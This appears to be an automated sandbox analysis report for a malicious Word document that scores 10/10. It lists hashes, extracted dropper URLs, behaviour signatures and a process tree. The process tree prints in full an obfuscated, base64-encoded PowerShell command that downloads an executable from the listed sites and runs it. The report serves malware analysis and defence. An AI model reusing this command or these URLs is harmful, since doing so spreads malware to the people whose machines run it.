Analysis

  • max time kernel
    105s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-06-2022 09:13

General

  • Target

    3e2b4e68ac973039ab0a3da9e7dae82521db17cb1ace27c230a1d3cb0ae430db.doc

  • Size

    208KB

  • MD5

    172c1e8607e66013f3cb6ec389f59699

  • SHA1

    43449ff24110838611d3dd450ff6a1d72bc370b4

  • SHA256

    3e2b4e68ac973039ab0a3da9e7dae82521db17cb1ace27c230a1d3cb0ae430db

  • SHA512

    a355f90fee2452f72e67cec1eb1713d026fd97c6b94ff4dd047677fd3afa014d5c8b25aeb54ebbe153a4cce58265d47f9b3fd3c4a9411bcf9bb7a7affc6f6399

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ahuratech.com/ei9u4vn/T_8z/

exe.dropper

http://mindigroup.com/wp-admin/T_tB/

exe.dropper

http://extraspace.uk.com/wp-admin/i_Gl/

exe.dropper

http://nuoviclienti.net/hanemdg/Es_wv/

exe.dropper

http://eniyionfirma.com/wp-admin/CI_xj/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3e2b4e68ac973039ab0a3da9e7dae82521db17cb1ace27c230a1d3cb0ae430db.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1776
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
      PoWeRsHelL -e JABiAG8ANABaAEQAQwBRAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHMANAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAEMAeABVACcAKQApADsAJABvAEEAQQBVAEEARwBEAEEAIAA9ACAAJwA5ADEANgAnADsAJABvADQAQgBCAFUAVQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGIARwBRACcALAAnADQAbwAnACkALAAnAGMAQwAnACwAJwBBACcAKQA7ACQAQgBBAGsAQQBVAEcAVQB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvAEEAQQBVAEEARwBEAEEAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQASABBAGMAUQBBAEMAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHcAVQBBACcALAAnAE4AQgB4ACcAKQA7ACQARQBrAEQAWgBHAEQAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAGAALgB3AEUAYABCAEMAbABpAGUAYABOAFQAOwAkAFoAWgAxAHcAQQBEAD0AKAAiAHsAMQAwAH0AewA2AH0AewAyADQAfQB7ADIAMQB9AHsANAA2AH0AewAxADYAfQB7ADIANgB9AHsAMQAzAH0AewA5AH0AewAyADMAfQB7ADEAOQB9AHsAMwA4AH0AewA0ADMAfQB7ADEANAB9AHsAMAB9AHsAOAB9AHsAMwAwAH0AewAzADMAfQB7ADQANAB9AHsANwB9AHsAMgAwAH0AewAyADkAfQB7ADIAMgB9AHsANAA4AH0AewAzADEAfQB7ADQAfQB7ADEAMQB9AHsAMQA3AH0AewAyADgAfQB7ADMANAB9AHsAMQA1AH0AewAzADUAfQB7ADQANwB9AHsANAAwAH0AewAyADUAfQB7ADIANwB9AHsAMwAyAH0AewAzADYAfQB7ADEAOAB9AHsAMQB9AHsAMQAyAH0AewAzADcAfQB7ADMAOQB9AHsAMwB9AHsANQB9AHsANAA1AH0AewA0ADIAfQB7ADQAMQB9AHsAMgB9ACIALQBmACcAZAAnACwAJwBAACcALAAnAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQByAG0AJwAsACcAbgBmACcAKQAsACcAaQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBjAG8AJwAsACcAYQAuACcAKQAsACcAbQAnACkALAAnAGMAJwAsACcAdAAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBCACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBtAGkAJwAsACcAbgAvAFQAJwApACwAJwBfAHQAJwApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBpACcALAAnAG0AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQBnAHIAJwAsACcAbgBkACcAKQApACwAKAAiAHsAMQB9AHsAMAB9AHsAMwB9AHsAMgB9ACIALQBmACAAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwB1ACcALAAnAHAAcwA6AC8AJwAsACcALwBhAGgAJwApACwAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALgAnACwAJwB0AGUAYwBoACcAKQAsACcAcgBhACcAKQAsACcAbgAvAGkAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAdABwADoALwAvAGUAJwAsACcAaAAnACkALAAnAG4AJwAsACcAaQB5ACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwACcALAAnADoALwAvACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGEAJwAsACcAdwBwAC0AJwApACwAJwBtAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAOgAvACcALAAnAHQAcAAnACkALAAnADkAdQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwBAACcALAAnAF8ARwBsACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHYALwAnACwAJwBfAHcAJwApACwAJwBzACcAKQAsACcAdQAnACwAJwB0AHAAOgAnACwAJwBtAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBzAHAAJwAsACcAYQBjAGUAJwApACwAJwBvACcALAAnAG8AJwAsACcAYQAnACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBUAF8AJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0AHQAJwAsACcALwBAAGgAJwAsACcAOAB6ACcAKQAsACcANAB2ACcALAAnAG4ALwAnACkALAAnAG4AJwAsACcAaAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgBhACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeAB0ACcALAAnAC8ALwAnACkAKQAsACcALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC0AJwAsACcAYQBkAG0AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBtAGQAZwAnACwAJwBlACcAKQAsACcAQAAnACwAJwB0ACcALAAnAC8AbgAnACwAJwAvAEUAJwAsACcAaQAnACwAJwBwAC4AJwAsACcAbwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAbgBlAHQAJwAsACcALwBoACcAKQAsACcAXwB4AGoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGkAbgAnACwAJwAvAEMAJwApACwAJwBJACcAKQAsACcAYwBvACcALAAnAGgAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwAvAHcAcAAnACwAJwBtACcALAAnAC0AYQBkACcAKQAsACcAZQBpACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAgAC0AZgAgACcAdgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBpAGUAbgB0AGkAJwAsACcAaQBjAGwAJwApACwAJwB1AG8AJwAsACcALgAnACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwB3AHAAJwAsACcALgB1AGsAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcALwAnACwAJwAuAGMAbwBtACcAKQApACkALgAiAHMAcABMAGAAaQB0ACIAKAAnAEAAJwApADsAJABzAEEAVQBDAF8AbwA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAYwBHACcALAAnAFUAJwApACwAJwBWAEIAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAcABfAFUAQgBBAEEAUQBVACAAaQBuACAAJABaAFoAMQB3AEEARAApAHsAdAByAHkAewAkAEUAawBEAFoARwBEAC4AIgBEAE8AVwBOAGwATwBhAGAAZABGAGAAaQBgAGwARQAiACgAJABwAF8AVQBCAEEAQQBRAFUALAAgACQAQgBBAGsAQQBVAEcAVQB3ACkAOwAkAEoAUQBRAFgAeABfAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBBAHcAJwAsACcAUQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG8AJwAsACcAUQBBADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQgBBAGsAQQBVAEcAVQB3ACkALgAiAGwAYABFAE4ARwB0AEgAIgAgAC0AZwBlACAAMgAxADUAOQA2ACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEIAQQBrAEEAVQBHAFUAdwA7ACQASABBAF8ARwBBAFgAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQgBBACcALAAnAEQAQgAnACkALAAnAFEAJwAsACcAUAB3ACcAKQA7AGIAcgBlAGEAawA7ACQARwBjAHgAQgBEAEEAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEIAawBCACcALAAnAFgAdwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaABCAEIAQQBaAFoAQQA9ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcASgAnACwAJwBHAEIAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBEAEIAJwAsACcAdwBvACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:756

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/756-66-0x000007FEF4580000-0x000007FEF4FA3000-memory.dmp

      Filesize

      10.1MB

    • memory/756-72-0x0000000002664000-0x0000000002667000-memory.dmp

      Filesize

      12KB

    • memory/756-73-0x000000000266B000-0x000000000268A000-memory.dmp

      Filesize

      124KB

    • memory/756-70-0x000000000266B000-0x000000000268A000-memory.dmp

      Filesize

      124KB

    • memory/756-69-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

      Filesize

      3.0MB

    • memory/756-67-0x000007FEF38D0000-0x000007FEF442D000-memory.dmp

      Filesize

      11.4MB

    • memory/756-68-0x0000000002664000-0x0000000002667000-memory.dmp

      Filesize

      12KB

    • memory/1260-59-0x000000007153D000-0x0000000071548000-memory.dmp

      Filesize

      44KB

    • memory/1260-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1260-63-0x0000000000637000-0x0000000000658000-memory.dmp

      Filesize

      132KB

    • memory/1260-64-0x0000000000637000-0x0000000000658000-memory.dmp

      Filesize

      132KB

    • memory/1260-61-0x0000000000637000-0x0000000000658000-memory.dmp

      Filesize

      132KB

    • memory/1260-75-0x000000007153D000-0x0000000071548000-memory.dmp

      Filesize

      44KB

    • memory/1260-54-0x0000000072AD1000-0x0000000072AD4000-memory.dmp

      Filesize

      12KB

    • memory/1260-74-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1260-57-0x00000000753C1000-0x00000000753C3000-memory.dmp

      Filesize

      8KB

    • memory/1260-71-0x000000007153D000-0x0000000071548000-memory.dmp

      Filesize

      44KB

    • memory/1260-62-0x0000000000637000-0x0000000000658000-memory.dmp

      Filesize

      132KB

    • memory/1260-55-0x0000000070551000-0x0000000070553000-memory.dmp

      Filesize

      8KB

    • memory/1776-60-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp

      Filesize

      8KB